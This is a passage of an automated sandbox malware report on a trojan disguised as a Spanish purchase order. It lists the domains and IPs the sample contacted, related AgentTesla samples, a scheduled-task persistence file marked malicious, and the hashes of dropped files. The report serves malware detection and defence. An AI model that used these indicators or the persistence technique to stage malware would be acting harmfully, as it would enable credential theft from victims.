                              http://crl.mnOrden_de_compra.exe, 0000000A.00000002.4543063904.00000000068E2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.microsoft.8nNdsLvHyWi.exe, 0000000F.00000002.4542926780.0000000005E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              http://mail.triorentacar.ronOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              https://sectigo.com/CPS0nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4543063904.0000000006927000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://account.dyn.com/nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmpfalse
                                high
                                https://api.ipify.org/tnOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenOrden_de_compra.exe, 00000000.00000002.2113140924.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000B.00000002.2146832318.00000000027FF000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://triorentacar.ronOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    89.32.46.159
                                    triorentacar.roRomania
                                    34358WEBCLASSITROfalse
                                    173.231.16.76
                                    api4.ipify.orgUnited States
                                    18450WEBNXUSfalse
                                    Joe Sandbox version:39.0.0 Ruby
                                    Analysis ID:1385592
                                    Start date and time:2024-02-02 14:03:07 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 10m 12s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:nOrden_de_compra.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@21/15@2/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 98%
                                    • Number of executed functions: 223
                                    • Number of non-executed functions: 16
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    TimeTypeDescription
                                    14:03:57API Interceptor8896667x Sleep call for process: nOrden_de_compra.exe modified
                                    14:03:58API Interceptor26x Sleep call for process: powershell.exe modified
                                    14:03:59Task SchedulerRun new task: nNdsLvHyWi path: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                    14:04:01API Interceptor7418522x Sleep call for process: nNdsLvHyWi.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    89.32.46.159Project_Offer_2024.exeGet hashmaliciousAgentTeslaBrowse
                                      ndHq.exeGet hashmaliciousAgentTeslaBrowse
                                        173.231.16.76InstallSetup1.exeGet hashmaliciousStealcBrowse
                                        • api.ipify.org/?format=dwd
                                        mhddos_proxy_win.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/?format=text
                                        Hhwsbefq.exeGet hashmaliciousTargeted RansomwareBrowse
                                        • api.ipify.org/
                                        4cGFnkiRf2.exeGet hashmaliciousTargeted RansomwareBrowse
                                        • api.ipify.org/
                                        Help.File@zohomail.eu_Fast.exeGet hashmaliciousTrojanRansomBrowse
                                        • api.ipify.org/
                                        DHLINV1708023_-_1301512300.exeGet hashmaliciousMassLogger RAT, zgRATBrowse
                                        • api.ipify.org/
                                        Ross.dec1966@gmail.com_Fast.bin.exeGet hashmaliciousBabuk, Chaos, Conti, RegretLocker, TrojanRansomBrowse
                                        • api.ipify.org/
                                        Imdouqb.batGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        XP5wlJGjng.exeGet hashmaliciousTyphon LoggerBrowse
                                        • api.ipify.org/
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        api4.ipify.orgINVOICE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 104.237.62.212
                                        sZ3v675Idu.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 173.231.16.76
                                        0001.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 64.185.227.156
                                        SecuriteInfo.com.Win32.CrypterX-gen.18920.7401.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 64.185.227.156
                                        SecuriteInfo.com.Trojan.MulDropNET.68.14731.14018.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 173.231.16.76
                                        SOA.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 64.185.227.156
                                        SecuriteInfo.com.FileRepMalware.4794.21088.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                        • 173.231.16.76
                                        OOLU4051770254.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 64.185.227.156
                                        SecuriteInfo.com.Win32.RATX-gen.28393.22981.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 64.185.227.156
                                        SOA_87437924_Payment______________________________PDF.exeGet hashmaliciousAgentTeslaBrowse
                                        • 64.185.227.156
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        WEBNXUSINVOICE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 104.237.62.212
                                        sZ3v675Idu.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 173.231.16.76
                                        0001.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 64.185.227.156
                                        SecuriteInfo.com.Win32.CrypterX-gen.18920.7401.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 64.185.227.156
                                        SecuriteInfo.com.Trojan.MulDropNET.68.14731.14018.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 173.231.16.76
                                        SOA.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 64.185.227.156
                                        SecuriteInfo.com.FileRepMalware.4794.21088.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                        • 173.231.16.76
                                        OOLU4051770254.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 64.185.227.156
                                        SecuriteInfo.com.Win32.RATX-gen.28393.22981.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 64.185.227.156
                                        SOA_87437924_Payment______________________________PDF.exeGet hashmaliciousAgentTeslaBrowse
                                        • 64.185.227.156
                                        WEBCLASSITROProject_Offer_2024.exeGet hashmaliciousAgentTeslaBrowse
                                        • 89.32.46.159
                                        ndHq.exeGet hashmaliciousAgentTeslaBrowse
                                        • 89.32.46.159
                                        arm7-20240101-1250.elfGet hashmaliciousMiraiBrowse
                                        • 37.251.157.173
                                        MS Document.htmlGet hashmaliciousPhisherBrowse
                                        • 37.251.137.194
                                        3m37SZRkdC.elfGet hashmaliciousMiraiBrowse
                                        • 37.251.157.145
                                        meerkat.x86.elfGet hashmaliciousMiraiBrowse
                                        • 37.251.157.141
                                        1x9SsU5xOL.elfGet hashmaliciousMiraiBrowse
                                        • 37.251.157.133
                                        73IQC7zT52.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 37.251.157.188
                                        scYHPiyZLt.elfGet hashmaliciousMiraiBrowse
                                        • 37.251.175.20
                                        QQlbAyRysQ.elfGet hashmaliciousMiraiBrowse
                                        • 37.251.175.25
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0ehttp://scsksa.comGet hashmaliciousUnknownBrowse
                                        • 173.231.16.76
                                        INVOICE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 173.231.16.76
                                        SecuriteInfo.com.Trojan.DownloaderNET.74.18381.3316.exeGet hashmaliciousUnknownBrowse
                                        • 173.231.16.76
                                        SecuriteInfo.com.Trojan.DownloaderNET.74.18381.3316.exeGet hashmaliciousUnknownBrowse
                                        • 173.231.16.76
                                        http://www.infobellit.comGet hashmaliciousUnknownBrowse
                                        • 173.231.16.76
                                        sZ3v675Idu.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 173.231.16.76
                                        Document.pdf.lnkGet hashmaliciousUnknownBrowse
                                        • 173.231.16.76
                                        https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b,8d23fb3,492093b&p1=energuapi%E3%80%82com/reesscw/cwsssw/dGhvcnN0ZW4uc2NobmVpZGV3aW5kQG9yaW9uLmNo#Get hashmaliciousHTMLPhisherBrowse
                                        • 173.231.16.76
                                        0001.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 173.231.16.76
                                        Cqqjbi.exeGet hashmaliciousUnknownBrowse
                                        • 173.231.16.76
                                        No context
                                        Process:C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1415
                                        Entropy (8bit):5.352427679901606
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                        MD5:3978978DE913FD1C068312697D6E5917
                                        SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                        SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                        SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
                                        Process:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1415
                                        Entropy (8bit):5.352427679901606
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                        MD5:3978978DE913FD1C068312697D6E5917
                                        SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                        SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                        SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2232
                                        Entropy (8bit):5.380805901110357
                                        Encrypted:false
                                        SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:lGLHyIFKL3IZ2KRH9OugIs
                                        MD5:E522B2005C3F8CEE121092726F0796D1
                                        SHA1:B3ABC6E4DEDB76609E5F101ED018B4A5C7C45404
                                        SHA-256:905C2721C090CBDA71FD37A5CACD974C87171364DD5ACBC8C3D7D58FE1D58CB5
                                        SHA-512:95BA8FB518A3067855DB06037CBB1DAF3CED0AAABD84716CF77EB4BD89F08870C3D3D7507FD6159A427AACC76BDF5ABB38B5607EEF92514CB38DBE3710F419AE
                                        Malicious:false
                                        Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        File Type:XML 1.0 document, ASCII text
                                        Category:dropped
                                        Size (bytes):1597
                                        Entropy (8bit):5.092628755864273
                                        Encrypted:false
                                        SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLSxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTqv
                                        MD5:F331AB1DFBD53BD28DC8A8DAEAC36A31
                                        SHA1:57CDFBFDD7668FC596D8F318CF99CE2E20FBD229
                                        SHA-256:54C1A5F0D3AB93240356CAA068C0FE585FC7B19DEC228B8EC17A4352AD82F725
                                        SHA-512:BAB89F3B60512C408E03DD31338D5D6AFE849E19C4DA1840EB288068E5EAD19CA04377DFF765F6939495D0469C067B097B3B4AF43CFCF1C3A11D6F63A0CC7B5C
                                        Malicious:true
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                        Process:C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                        File Type:XML 1.0 document, ASCII text
                                        Category:dropped
                                        Size (bytes):1597
                                        Entropy (8bit):5.092628755864273
                                        Encrypted:false
                                        SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLSxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTqv
                                        MD5:F331AB1DFBD53BD28DC8A8DAEAC36A31
                                        SHA1:57CDFBFDD7668FC596D8F318CF99CE2E20FBD229
                                        SHA-256:54C1A5F0D3AB93240356CAA068C0FE585FC7B19DEC228B8EC17A4352AD82F725
                                        SHA-512:BAB89F3B60512C408E03DD31338D5D6AFE849E19C4DA1840EB288068E5EAD19CA04377DFF765F6939495D0469C067B097B3B4AF43CFCF1C3A11D6F63A0CC7B5C
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                        Process:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):730624
                                        Entropy (8bit):7.928891623206955
                                        Encrypted:false
                                        SSDEEP:12288:gOd53rD22AAxia+iWUd1jIXbsZ9uXIfa5vWwRkP/l14zAFDQzjgWaqPK6k3LlYl:NrDa5a+iJXIr89fOmnnDQf4bP3LlY
                                        MD5:593BB72286C1C2CE5C2456C7D9585A80
                                        SHA1:CB9BF63F9005D5B4F1BCBCF3EFEAD399A1C960A7
                                        SHA-256:84F0A1001A606072B86D8ECA2C4D9CCEFC71C38FF71D0AAA2F4AE003F802917B
                                        SHA-512:2FD046FC4730A5E912BFC1CD33CDC2601B159F2B55FBFB86ED6BB966DD5D147586E245BB30BDAAF78B568C814985FC488920FAA87FC87D8F9AD0534AB27DAF83
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 63%
                                        • Antivirus: Virustotal, Detection: 43%, Browse
